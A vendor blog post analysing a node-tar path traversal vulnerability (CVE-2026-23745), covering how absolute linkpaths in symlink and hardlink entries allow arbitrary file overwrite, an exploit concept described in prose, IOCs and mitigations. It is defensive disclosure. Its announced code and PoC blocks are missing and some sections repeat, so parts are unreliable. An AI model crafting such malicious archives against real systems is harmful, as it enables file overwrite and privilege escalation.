Meet Foresiet Nexus — Your smarter Threat Intel hub. See it in action — book a free demo today!
Get Started
Search

Blog categories

Weekly newsletter

No spam. Just the latest releases and tips, interesting articles, and exclusive interviews in your inbox every week.

Read about our privacy policy.

Latest from the blog

CVE-2026-23745: A Deep Dive into the node-tar Arbitrary File Overwrite Vulnerability

Posted on: 19 Jan 2026 | Author: Foresiet

Introduction

CVE-2026-23745 is a high-severity path traversal flaw in node-tar (the tar library for Node.js). Versions ≤7.5.2 fail to sanitize linkpath in hardlink and symlink entries when preservePaths is false (default secure mode). Malicious tar archives bypass extraction root restrictions, enabling arbitrary file overwrite via hardlinks and symlink poisoning via absolute targets. Discovered January 2026, patched in 7.5.3. Impacts npm ecosystems, CI/CD pipelines, and apps extracting untrusted archives. This analysis covers mechanics, exploits, campaigns, IOCs, and mitigations.

Executive Summary

Node-tar has history of path traversal issues (e.g., CVE-2021-32803/32804 symlink/absolute path bugs). CVE-2026-23745 surfaced January 2026 via GitHub advisory GHSA-8qq5-rm4j-mr97. Maintainer isaacs patched in commit 340eb285b6d986e91969a1170d7fe9b0face405e (v7.5.3). Debian security-tracker added January 17, 2026; fixed in unstable by January 18. No prior public PoC; similar to older tar vulns allowing arbitrary writes.

History and Development

node-tar has history of path traversal issues (e.g., CVE-2021-32803/32804 symlink/absolute path bugs). CVE-2026-23745 surfaced January 2026 via GitHub advisory GHSA-8qq5-rm4j-mr97. Maintainer isaacs patched in commit 340eb285b6d986e91969a1170d7fe9b0face405e (v7.5.3). Debian security-tracker added January 17, 2026; fixed in unstable by January 18. No prior public PoC; similar to older tar vulns allowing arbitrary writes.

Technical Analysis: How CVE-2026-23745 Works

Vulnerability in symlink/hardlink handling during extraction. When preservePaths: false, node-tar strips leading / from entry.path but skips linkpath sanitization.

  1. Extraction Flow: tar.x() processes entries; for Symlink/Hardlink, creates link with entry.linkpath.
  2. Bypass: Absolute linkpath (e.g., /etc/shadow) bypasses root prefix; hardlink to existing file overwrites target.

Example vulnerable code pattern (simplified from node-tar):

Example vulnerable code pattern (simplified from node-tar):
  1. Malicious tar: entry with path: “foo”, linkpath: “/target/secret”, type: symlink → poisons /target/secret.
  2. Impact: Overwrite configs, inject keys, escalate privileges.
  3. Evasion: Blends with normal extraction; no auth/network needed.

Logs show unexpected symlinks/hardlinks to absolute paths.

CVE-2026-23745 Evolution: Exploit Details

Post-patch, focus on linkpath validation. Exploit: craft tar with absolute linkpath in symlink/hardlink entries.

PoC Concept (Python tar creation)

Extract with vulnerable node-tar → overwrites /etc/passwd symlink.

No public full PoC yet; similar to historical GHSA advisories.

Current Campaigns

Limited exploitation: fresh CVE (disclosed ~Jan 16-17, 2026). Potential in npm supply-chain (e.g., malicious packages with evil.tar). No widespread scans reported; watch for dependency confusion or typo-squatting using vulnerable node-tar. Debian tracks fixes; npm ecosystem likely auditing dependents.

Who is at risk from CVE-2026-23745 (node-tar Arbitrary File Overwrite)?

  • Developers using node-tar ≤ 7.5.2 in their projects
  • Anyone extracting untrusted tar archives (npm packages, downloads, CI/CD pipelines)
  • CI/CD systems that automatically unpack archives
  • Applications that process user-uploaded tar files
  • npm package maintainers with vulnerable dependencies

Indicators of Compromise (IOCs)

  • Tar entries: linkpath starting with / or absolute.
  • Filesystem: unexpected symlinks/hardlinks to system paths.
  • Network: none (local extraction).

YARA rule:

YARA rule-Monitor extraction logs for absolute linkpaths.

Monitor extraction logs for absolute linkpaths.

Mitigation and Best Practices

  • Patch: Upgrade node-tar ≥7.5.3; rebuild lockfiles.
  • Workaround: Set preservePaths: false; custom filter/onentry to reject absolute linkpath.
  • Prevention: Validate/extract in sandbox; avoid untrusted tars.
  • Detection: File integrity monitoring; EDR for unexpected writes.

Conclusion

CVE-2026-23745 revives path traversal risks in node-tar, enabling arbitrary overwrites from malicious archives. Quick patch in 7.5.3 limits exposure, but audit dependencies urgently. Proactive upgrades and input validation essential in Node.js ecosystems.

About us!

Foresiet is the pioneering force in digital security solutions, offering the first integrated Digital Risk Protection SaaS platform. With 24x7x365 dark web monitoring and proactive threat intelligence, Foresiet safeguards against data breaches and intellectual property theft. Our robust suite includes brand protection, takedown services, and supply chain assessment, enhancing your organization’s defense mechanisms. Attack surface management is a key component of our approach, ensuring comprehensive protection across all vulnerable points. Compliance is assured through adherence to ISO27001, NIST, GDPR, PCI, SOX, HIPAA, SAMA, CITC, and Third Party regulations. Additionally, our advanced antiphishing shield provides unparalleled protection against malicious emails. Trust Foresiet to empower your organization to navigate the digital landscape securely and confidently.

Latest

From the blog

The latest industry news, interviews, technologies, and resources.

View all posts
Tagged